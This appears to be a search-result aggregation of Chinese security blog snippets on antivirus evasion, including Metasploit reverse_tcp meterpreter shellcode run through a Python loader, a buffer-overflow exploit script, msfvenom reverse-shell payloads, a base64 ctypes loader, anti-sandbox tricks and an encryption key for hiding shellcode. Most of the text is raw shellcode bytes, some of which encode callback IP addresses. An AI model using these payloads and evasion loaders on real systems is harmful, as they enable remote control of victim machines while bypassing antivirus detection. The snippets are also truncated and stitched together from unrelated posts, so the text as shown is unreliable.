之前一直看大家在做分离免杀,但大部分都是windows上的,既然学习Linux,就搞一个Linux版本的一句话反弹meterpreter,借用分离免杀的思想:用 Python3 执行 shellcode...payload : linux/x64/meterpreter/reverse_tcp 生成shellcode use payload/linux/x64/meterpreter/reverse_tcp...\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51" + "\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01" +...Return pointer to shell code function in executable memory return function buf = "shellcode" # linux...\x48\x85\xc0\x78\xed\xff\xe6" # linux machine code shellcode = buf # Create a pointer to our shell
clone https://github.com/David-Reguera-Garcia-Dreg/shellex.git 针对Windows: shellex\bins\shellex.exe 针对Linux...接下来,输入我们的shellcode: "\x6a\x17\x58\x31\xdb\xcd\x80" "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52...tmp/sc ndisasm -b32 /tmp/sc | wc -l 64位: ndisasm -b64 /tmp/sc ndisasm -b64 /tmp/sc | wc -l 无交互模式 在Linux...“\x6a\x17\x58\x31\xdb\xcd\x80”: echo "\x6a\x17\x58\x31\xdb\xcd\x80" | shellex.exe Windows下写入多行文件: C:.../bin\x89\xe3\x52\x53\x89\xe1\xcd\x80" C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe Linux
3、suid提权 SUID代表设置的用户ID,是一种Linux功能,允许用户在指定用户的许可下执行文件。例如,Linux ping命令通常需要root权限才能打开原始网络套接字。...在Linux中我们将cookie信息称为canary。.../python import sys, socket EIP = "\xd1\xf2\xff\xbf" junk = "A"*732 NOP = "\x90" * 16 # msfvenom -p linux...\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42...\x75\x4a\x49\x35" "\x61\x58\x49\x4c\x49\x48\x4b\x50\x6a\x51\x56\x51\x48\x68\x4d" "\x4b\x30\x42\x4a\x53
\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b" payload += b"\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24..." payload += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" payload += b"\x12\xe9\x80\xff\xff...\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b" payload += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58...\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68" payload += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58...Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGVyKSwgY3R5cGVzLmNfaW50KC0xKSk=')) windows defender检测结果: 360检测结果: 2、添加反沙盒机制过杀软动态检测 在kali linux
**** 本文章仅供教学为目的,若该文章的技术造成财产损失,本文作者概不负责 **** 虚拟机环境 Kali Linux IP: 192.168.107.128 Windows Defender:...\x48\x01" "\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83" "\xec\x20\x41\x52\xff\xe0\x58\x41...\x48\x89\xf2\x48\x31\xc9\x41\xba" "\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31" "\xc9\x49...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83" //"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48...\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9" //"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41
\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75" buf += b"\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48" buf += b"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a...\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf" buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58...\x48\x89\xf2\x48\x31" buf += b"\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49" buf += b"\x89\xc7...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48" buf += b"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a
x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58...x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"...x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\...\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x31\x35\x2e\x31\x35\x39\x2e\x39\x37\...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58...\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"...\x73\x47\x6e\x70\x53\x50\x53\x6e\x33\x64\x73\x53\x7a\x6e\x2d" "\x41\x2d\x50\x56\x39\x74\x2d\x6f\x58...\x4f\x56\x45\x30\x47\x55" "\x61\x63\x34\x61\x41\x68\x42\x53\x67\x57\x58\x69\x6c\x71\x52" "\x33...\x5f\x4d\x70\x44\x30\x35\x39\x4b\x4b\x6b\x4b\x49\x6c\x6a" "\x48\x51\x50\x2d\x4d\x32\x75\x64\x4e\x58
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58...\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73" buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b...\x31\x6d" buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f" buf += b"\x34\x6a\x61\x7a\x33...\x31\x56\x54\x4b\x4c\x4c\x6e\x6b" buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a" buf...+= b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54" buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\
x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58...x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\...x00\xe8\xa2\xff\xff\xff\x2f\x66\x42\x4f\x66\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58...\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\
x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58...x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\...x00\xe8\xa2\xff\xff\xff\x2f\x33\x77\x7a\x39\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58...\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\
\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78" "\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b\x58...x34\x8b\x01\xd6\x31\xc0\xac" "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24" "\x75\xe0\x58...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c" "\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b...\x61\x59" "\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d" "\x68\x6e\x65\x74\x00\x68\x77...\x44\x6d\x76\x68\x35\x64\x4d\x46\x5f\x32" "\x34\x6b\x44\x5a\x6d\x79\x43\x65\x69\x32\x33\x55\x75\x66\x58
xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58...x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\...x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\
x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58..." "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\...x04\x56\x57\x68\x02" "\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00" "\x56\x6a\x00\x68\x58
\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48" "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b...\x48\x89\xf2\x48\x31\xc9\x41" "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31" "\xc9\x49...\x68\x00\x40" "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5" "\x57\x59\x41\xba\x75\x6e...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48" "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a
x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58...x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\...xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58
x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58...x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\...Captain.MeeloIsTheSuperSecretKey"; unsigned char iv[] = "\x9d\x02\x35\x3b\xa3\x4b\xec\x26\x13\x88\x58...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\
领取专属 10元无门槛券
手把手带您无忧上云